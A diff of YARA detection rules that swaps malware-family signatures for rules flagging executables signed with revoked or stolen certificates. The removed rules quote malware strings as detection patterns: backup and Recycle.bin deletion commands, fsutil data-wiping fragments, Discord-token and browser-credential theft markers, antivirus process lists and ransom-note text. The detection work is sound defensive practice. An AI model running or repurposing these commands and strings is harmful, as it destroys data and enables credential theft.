-		logic_hash = "bd3823f8a91fdfc443e20bcb299a5103b7176a694f0d5328e7986de83f677a31"
+		logic_hash = "f9cc0f526a3acbfc30c6b76b6705f1a2d9c905b9bb7c996e4db3ca6d4d63be1c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ACTION=PREVPAGE&CODE=C%s&RES=%d" fullword ascii
-		$s2 = "ACTION=VIEW&PAGE=%s&CODE=%s&CACHE=%s&REQUEST=%d" fullword ascii
-		$s3 = "ACTION=NEXTPAGE&CODE=S%s&CACHE=%s&RES=%d" fullword ascii
-		$s4 = "Your request has been accepted. ClientID: {" ascii
-		$s5 = "Proxy-Connection: Keep-Alive" fullword wide
-		$s6 = "Content-Length: %d" fullword wide
-		$o0 = { f7 f9 8b c2 89 44 24 34 48 63 44 24 34 48 8b 4c }
-		$o1 = { 48 c7 00 ff ff ff ff 48 8b 84 24 90 }
-		$o2 = { f3 aa 83 7c 24 30 01 75 34 c7 44 24 20 01 }
+		thumbprint = "8e50ddad9fee70441d9eb225b3032de4358718dc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $o* ) and 3 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIT HORIZON LIMITED" and pe.signatures [ i ] . serial == "73:b6:07:19:ee:57:97:44:47:c6:81:87:e4:99:69:a2" )
 }
-rule DITEKSHEN_MALWARE_Win_Thanos : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2925263B65C7Fe1Cd47B0851Cc6951E3 : FILE
 {
 	meta:
-		description = "Detects Thanos / Prometheus / Spook ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "f523906e-ef5e-57be-82ed-06e75c393f42"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9e531592-b68c-550b-8609-51f7c9ac63ae"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4357-L4389"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L811-L822"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ce7cdfe4bca31e21d6fa31a75c46737a41fae3b5b0fda818e3a4709ceaf9bf5"
+		logic_hash = "163293ce805cdd3ec265fb9c527a5ce19ddab0f6b96355acb636c941ce0bc5f2"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$f1 = "<WorkerCrypter2>b__" ascii
-		$f2 = "<Encrypt2>b__" ascii
-		$f3 = "<Killproc>b__" ascii
-		$f4 = "<GetIPInfo>b__" ascii
-		$f5 = "<MacAddress>k__" ascii
-		$f6 = "<IPAddress>k__" ascii
-		$f7 = "<Crypt>b__" ascii
-		$s1 = "Aditional KeyId:" wide
-		$s2 = "process call create cmd.exe /c \\\\" wide
-		$s3 = "/c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin" wide
-		$s4 = "\\HOW_TO_DECYPHER_FILES." wide
-		$s5 = "Client Unique Identifier Key:" wide
-		$s6 = "/s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk" fullword wide
-		$s7 = "NtOpenProcess" fullword wide
-		$s8 = "Builder_Log" fullword wide
-		$s9 = "> Nul & fsutil file setZeroData offset=0 length=" wide
-		$s10 = "3747bdbf-0ef0-42d8-9234-70d68801f407" wide
-		$s11 = "4b195894-0f06-4fdd-afb4-b17fb9246a59" wide
-		$s12 = "cec564ff-2433-4771-b918-15f58ef6e26c" wide
-		$s13 = "56258a19-7489-468b-86ee-e7899203d67c" wide
-		$s14 = "WalkDirectoryTree" fullword ascii
-		$s15 = "hashtableLock" fullword ascii
-		$s16 = "get_ParentFrn" fullword ascii
-		$m1 = "SW5mb3JtYXRpb24uLi" wide
-		$m2 = "QWxsIHlvdXIgZmlsZXMgd2VyZSBlbmNyeXB0" wide
+		thumbprint = "88ef10f0e160b1b4bb8f0777a012f6b30ac88ac8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or 5 of ( $s* ) or ( 4 of ( $f* ) and 2 of ( $s* ) or ( all of ( $m* ) and 3 of them ) ) or 8 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "tuning buddy limited" and pe.signatures [ i ] . serial == "29:25:26:3b:65:c7:fe:1c:d4:7b:08:51:cc:69:51:e3" )
 }
-rule DITEKSHEN_MALWARE_Win_Tmanager : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4Ff4Eda5Fa641E70162713426401F438 : FILE
 {
 	meta:
-		description = "Detects TManager RAT. Associated with TA428"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "391b72bd-ddf5-5251-b566-c75c1cc16b74"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "cc81ed1d-bd77-5cec-8bee-23e8ef448edc"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4391-L4410"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L824-L835"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cdbcc00ae67c9161f6db89cfa658c8bc8fb7fab3915ac5ae99bdd34c42ee2abb"
+		logic_hash = "d08e12e74e9c0b7a89ffa81a1b8595953d857e571a5b7a6947eba18bf39610f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "WSAStartup Error!" fullword wide
-		$s2 = "KB3112342.LOG" fullword wide
-		$s3 = "\\cmd.exe -c" fullword wide
-		$s4 = "sock_hmutex" fullword wide
-		$s5 = "cmd_hmutex" fullword wide
-		$s6 = "powershell" fullword wide
-		$s7 = "%s_%d.bmp" fullword wide
-		$s8 = "!Error!" fullword wide
-		$s9 = "[Execute]" fullword ascii
-		$s10 = "[Snapshot]" fullword ascii
-		$s11 = "GetLanIP error!" fullword ascii
-		$s12 = "chcp & exit" fullword ascii
+		thumbprint = "a6277cc8fce0f90a1909e6dac8b02a5115dafb40"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DUHANEY LIMITED" and pe.signatures [ i ] . serial == "4f:f4:ed:a5:fa:64:1e:70:16:27:13:42:64:01:f4:38" )
 }
-rule DITEKSHEN_MALWARE_Win_Sn0Wlogger : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_04C7Cdcc1698E25B493Eb4338D5E2F8B : FILE
 {
 	meta:
-		description = "Detects Sn0w Logger"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "cdb70164-3f72-553f-a6c5-190f699e0743"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "446608c2-4c9e-56a9-8ac4-2c90397d68e5"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4412-L4428"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L837-L848"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ea4b2281f906271dc249b5036b22eadfc5add94def4f8e4f8a40c384618465d8"
+		logic_hash = "d1e81d040a279d6024989acbdd40f69de99c97baf789591400370806e846a1c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\SnowP\\Example\\Secured\\" ascii
-		$s2 = "{0}{3}Content-Type: {4}{3}Content-Disposition: form-data; name=\"{1}\"{3}{3}{2}{3}" wide
-		$s3 = "\"encrypted_key\":\"(.*?)\"" fullword wide
-		$s4 = "<SendToDiscord>d__" ascii
-		$s5 = "_urlWebhook" ascii
-		$r1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword wide
-		$r2 = "^\\w+([-+.']\\w+)*@\\w+([-.]\\w+)*\\.\\w+([-.]\\w+)*$" fullword wide
-		$r3 = "mfa\\.[\\w-]{84}" fullword wide
-		$r4 = "(\\w+)=(\\d+)-(\\d+)$" fullword wide
+		thumbprint = "60974f5cc654e6f6c0a7332a9733e42f19186fbb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $r* ) and 2 of ( $s* ) ) or 7 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3AN LIMITED" and pe.signatures [ i ] . serial == "04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" )
 }
-rule DITEKSHEN_MALWARE_Win_Danabot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4C450Eccd61D334E0Afb2B2D9Bb1D812 : FILE
 {
 	meta:
-		description = "Detects DanaBot variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "a49e21b9-d40a-5273-a9a2-322a1ec9bbbc"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "116c86c1-facf-5b69-94f1-3f0f81c38a7d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4430-L4459"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L850-L861"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d037b46d719159dc3e60f0c7143022ce8745cfd753c3754ae80a220a838567d"
+		logic_hash = "70851d76af4a4dfe8f1ca4de9925f030d9b937050876828775b78eddd123e3cd"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ms ie ftp passwords" fullword wide
-		$s2 = "CookieEntryEx_" fullword wide
-		$s3 = "winmgmts:\\\\localhost\\root\\cimv2" fullword wide
-		$s4 = "S-Password.txt" fullword wide
-		$s5 = "del_ini://Main|Password|" fullword wide
-		$s6 = "cmd.exe /c start chrome.exe --no-sandbox" wide
-		$s7 = "cmd.exe /c start firefox.exe -no-remote" wide
-		$s8 = "\\rundll32.exe shell32.dll,#" wide
-		$s9 = "S_Error:TORConnect" wide
-		$s10 = "InjectionProcess" fullword ascii
-		$s11 = "proxylogin" fullword wide
-		$s12 = "\\FS_Morff\\FS_Temp\\" wide
-		$ds1 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
-		$ds2 = "PExtended4" fullword ascii
-		$ds3 = "%s-%s" fullword wide
-		$ds4 = "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9FA0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF0123456789ABCDEF" fullword wide
+		thumbprint = "4c450eccd61d334e0afb2b2d9bb1d812"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or all of ( $ds* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANJELA KEY LIMITED" and pe.signatures [ i ] . serial == "4c:45:0e:cc:d6:1d:33:4e:0a:fb:2b:2d:9b:b1:d8:12" )
 }
-rule DITEKSHEN_MALWARE_Win_Klackring : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0E1Bacb85E77D355Ea69Ba0B : FILE
 {
 	meta:
-		description = "Detects Klackring variants. Associated with ZINC / Lazarus"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "7bd9a68f-d58b-5437-a28b-5a7f1a11038e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "18e2dce1-c6aa-55d8-907a-75097feb7acf"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4461-L4475"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L863-L874"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b894e89de720affadd80966d726a44ffce75d71095b0530edb6bfddb76660c54"
+		logic_hash = "f0753c83001e2b9d235afe51ce5d245e085551584ee052a35aaadd95c6c5eeb7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%s\\%s.dll" fullword wide
-		$s2 = "cmd.exe /c move /Y %s %s" fullword wide
-		$s3 = "%s\\win32k.sys" fullword wide
-		$s4 = "NetSvcInst_Rundll32.dll" fullword ascii
-		$s5 = "Spectrum.dll" fullword ascii wide
-		$s6 = "%s\\cmd.exe" fullword wide
-		$s7 = ".?AVA5Stream@@" fullword ascii
+		thumbprint = "6750c9224540d7606d3c82c7641f49147c1b3fd0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BULDOK LIMITED" and pe.signatures [ i ] . serial == "0e:1b:ac:b8:5e:77:d3:55:ea:69:ba:0b" )
 }
-rule DITEKSHEN_MALWARE_Win_Comebacker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5998B4Affe2Adf592E6528Ff800E567C : FILE
 {
 	meta:
-		description = "Detects ComeBacker variants. Associated with ZINC / Lazarus"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d0454d09-4a15-5251-aa7a-cb00604715ca"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b81787fd-a8f1-5640-bf8a-8129f708a337"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4477-L4492"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L876-L887"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0d806fd199f0e8e3576ca837781c2fa06f1a09d75ea16602effb72754d8e4940"
+		logic_hash = "d9f589ce6367517f3c93b7b0675b19249108849e52bd9264e31bf8109e5a121f"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ENGINE_get_RAND" ascii
-		$s2 = "./{IES" fullword ascii
-		$s3 = "TODO: <Company name>" fullword wide
-		$s4 = "@Microsoft Corperation. All rights reserved." fullword wide
-		$s5 = "Microsoft@Windows@Operating System" fullword wide
-		$x1 = "C:\\Windows\\System32\\rundll32.exe %s,%s %s %s" fullword ascii wide
-		$x2 = "ASN2_TYPE_new" fullword ascii wide
-		$x3 = "SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\" fullword ascii wide
+		thumbprint = "d990d584c856bd28eab641c3c3a0f80c0b71c4d7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAT GOES ON LIMITED" and pe.signatures [ i ] . serial == "59:98:b4:af:fe:2a:df:59:2e:65:28:ff:80:0e:56:7c" )
 }
-rule DITEKSHEN_MALWARE_Win_Suncrypt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B7E0Cf12E4Ae50Dd643A24285485602F : FILE
 {
 	meta:
-		description = "Detects SunCrypt ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "1a28fcbf-1fc0-5f18-ae71-2e813ed0f958"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d314925c-c6b2-5a7f-ba73-038ea4759149"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4494-L4532"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L889-L900"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "abde9bbf2577304ff059972a38e803ba17de7a1f0346efe880a710f2ad79db37"
+		logic_hash = "7aefb436b7e3865b1abb6bbc3e0027a628f39e25cb4b28f35f070e000c19c1c7"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "-noshares" fullword wide
-		$s2 = "-nomutex" fullword wide
-		$s3 = "-noreport" fullword wide
-		$s4 = "-noservices" fullword wide
-		$s5 = "$Recycle.bin" fullword wide
-		$s6 = "YOUR_FILES_ARE_ENCRYPTED.HTML" fullword wide
-		$s7 = "\\\\?\\%c:" fullword wide
-		$s8 = "locker.exe" fullword ascii
-		$s9 = "DllRegisterServer" fullword ascii
-		$g1 = "main.EncFile" fullword ascii nocase
-		$g2 = "main.detectName" fullword ascii nocase
-		$g3 = "main.detectIP" fullword ascii nocase
-		$g4 = "main.detectDebugProc" fullword ascii nocase
-		$g5 = "main.Bypass" ascii nocase
-		$g6 = "main.allocateMemory" fullword ascii nocase
-		$g7 = "main.killAV" fullword ascii nocase
-		$g8 = "main.disableShadowCopy" fullword ascii nocase
-		$g9 = "main.(*windowsDrivesModel).LoadDrives" fullword ascii nocase
-		$g10 = "main.IsFriends" fullword ascii nocase
-		$g11 = "main.walkMsg" fullword ascii nocase
-		$g12 = "main.makeSecretMessage" fullword ascii nocase
-		$g13 = "main.stealFiles" fullword ascii nocase
-		$g14 = "main.newKey" fullword ascii nocase
-		$g15 = "main.openBrowser" fullword ascii nocase
-		$g16 = "main.killProc" fullword ascii nocase
-		$g17 = "main.selfRemove" fullword ascii nocase
-		$m1 = "<h2>\\x20Offline\\x20HowTo\\x20</h2>\\x0a\\x09\\x09\\x09\\x09<p>Copy\\x20&\\x20Paste\\x20this\\x20message\\x20to" ascii
-		$m2 = "\\x20restore\\x20your\\x20files." ascii
-		$m3 = "\\x20your\\x20documents\\x20and\\x20files\\x20encrypted" ascii
-		$m4 = "\\x20lose\\x20all\\x20of\\x20your\\x20data\\x20and\\x20files." ascii
-		$m5 = ",'/#/client/','<h2>\\x20Whats\\x20Happen" ascii
+		thumbprint = "744160f36ba9b0b9277c6a71bf383f1898fd6d89"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 6 of ( $g* ) or 3 of ( $m* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GESO LTD" and pe.signatures [ i ] . serial == "00:b7:e0:cf:12:e4:ae:50:dd:64:3a:24:28:54:85:60:2f" )
 }
-rule DITEKSHEN_MALWARE_Win_Zegost : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_767436921B2698Bd18400A24B01341B6 : FILE
 {
 	meta:
-		description = "Detects Zegost"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "cce29602-c096-53df-a99b-16f18ed43b80"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ffd19457-1a5d-5782-89e2-3dd4090f124f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4534-L4560"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L902-L913"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "96727a0f5c113e5cdfe871f104553fd1c04a8f63ecbb8db7223afb71fcdd4087"
+		logic_hash = "b09ec625a06dcf90df52c56b78889f24d55dbd8cbd7d82a07bdbc842318ff19a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "rtvscan.exe" fullword ascii
-		$s2 = "ashDisp.exe" fullword ascii
-		$s3 = "KvMonXP.exe" fullword ascii
-		$s4 = "egui.exe" fullword ascii
-		$s5 = "avcenter.exe" fullword ascii
-		$s6 = "K7TSecurity.exe" fullword ascii
-		$s7 = "TMBMSRV.exe" fullword ascii
-		$s8 = "RavMonD.exe" fullword ascii
-		$s9 = "kxetray.exe" fullword ascii
-		$s10 = "mssecess.exe" fullword ascii
-		$s11 = "QUHLPSVC.EXE" fullword ascii
-		$s12 = "360tray.exe" fullword ascii
-		$s13 = "QQPCRTP.exe" fullword ascii
-		$s14 = "knsdtray.exe" fullword ascii
-		$s15 = "V3Svc.exe" fullword ascii
-		$s16 = "??1_Winit@std@@QAE@XZ" fullword ascii
-		$s17 = "ClearEventLogA" fullword ascii
-		$s18 = "SeShutdownPrivilege" fullword ascii
-		$s19 = "%s\\shell\\open\\command" fullword ascii
+		thumbprint = "871899843b5fd100466e351ca773dac44e936939"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REBROSE LEISURE LIMITED" and pe.signatures [ i ] . serial == "76:74:36:92:1b:26:98:bd:18:40:0a:24:b0:13:41:b6" )
 }
-rule DITEKSHEN_MALWARE_Win_GENERIC01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_26B125E669E77A5E58Db378E9816Fbc3 : FILE
 {
 	meta:
-		description = "Detects known unamed malicious executables, mostly DLLs"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "3c16df71-f2e2-591c-b377-7e5ed697d43f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "18985965-9e26-526c-9354-20667d472615"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4562-L4575"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L915-L926"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ddae979db5ddda772ca66a3d50e4b5479b16052ea002fd04fdbf295ce784e291"
+		logic_hash = "859793bfeba55c9912a1e18db86cd391d4c4981f4be11f3a53d887d429882671"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\wmkawe_%d.data" ascii
-		$s2 = "\\resmon.resmoncfg" ascii
-		$s3 = "ByPassUAC" fullword ascii
-		$s4 = "rundll32.exe C:\\ProgramData\\Sandboxie\\SbieMsg.dll,installsvc" fullword ascii nocase
-		$s5 = "%s\\SbieMsg." ascii
-		$s6 = "Stupid Japanese" fullword ascii
+		thumbprint = "900aa9e6ff07c6528ecd71400e6404682e812017"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLOWER DELI LTD" and pe.signatures [ i ] . serial == "26:b1:25:e6:69:e7:7a:5e:58:db:37:8e:98:16:fb:c3" )
 }
-rule DITEKSHEN_MALWARE_Win_GENERIC02 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_29A248A77D5D4066Fe5Da75F32102Bb5 : FILE
 {
 	meta:
-		description = "Detects known unamed malicious executables"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d0d24e69-0e99-5766-8e8e-9cdce902fa8f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b71f4ee4-55d1-51c7-8fc3-1c6fcaa64a86"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4577-L4591"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L928-L939"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f750c871ee061ed2d5d1f68e6ac1f56b8127321cfc207e2dd1dbed9d9848ce5"
+		logic_hash = "063a8b361e9fc91619912109427f6a0cbc7755e85dae820ea0f16709ac580ed1"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "{%s-%d-%d}" fullword wide
-		$s2 = "update" fullword wide
-		$s3 = "https://" fullword wide
-		$s4 = "http://" fullword wide
-		$s5 = "configure" fullword ascii
-		$s6 = { 8d 4f 02 e8 8c ff ff ff 8b d8 81 fb 00 dc 00 00 }
-		$s7 = { 83 c1 02 e8 3c ff ff ff 8b c8 ba ff 03 00 00 8d }
+		thumbprint = "1078c0ab5766a48b0d4e04e57f3ab65b68dd797f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SUN & STARZ LIMITED" and pe.signatures [ i ] . serial == "29:a2:48:a7:7d:5d:40:66:fe:5d:a7:5f:32:10:2b:b5" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent06 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3A9Bdec10E00E780316Baaebfe7A772C : FILE
 {
 	meta:
-		description = "Detects known downloader agent downloading encoded binaries in patches"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "00cb5184-b12d-5014-bee8-116cc72dfa47"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0879b4f7-4058-5391-b8bf-90a46ef337f6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4593-L4610"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L941-L952"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9188804ad0e08f3e0cd09eb8815abea14da5aa28aef9084d19108a24f49f65c7"
+		logic_hash = "f1c0d23c9aa2ff705e3350e15b7ff83fc007ce6aaa57c4ed59201f3022f5d00a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "920122"
-		snort3_sid = "920119"
-
-	strings:
-		$s1 = "totallist" fullword ascii wide
-		$s2 = "LINKS_HERE" fullword wide
-		$s3 = "[SPLITTER]" fullword wide
-		$var2_1 = "DownloadWeb" fullword ascii
-		$var2_2 = "WriteByte" fullword ascii
-		$var2_3 = "MemoryStream" fullword ascii
-		$var2_4 = "DownloadString" fullword ascii
-		$var2_5 = "WebClient" fullword ascii
+		thumbprint = "981b95ffcb259862e7461bc58516d7785de91a8a"
+		importance = 20
 
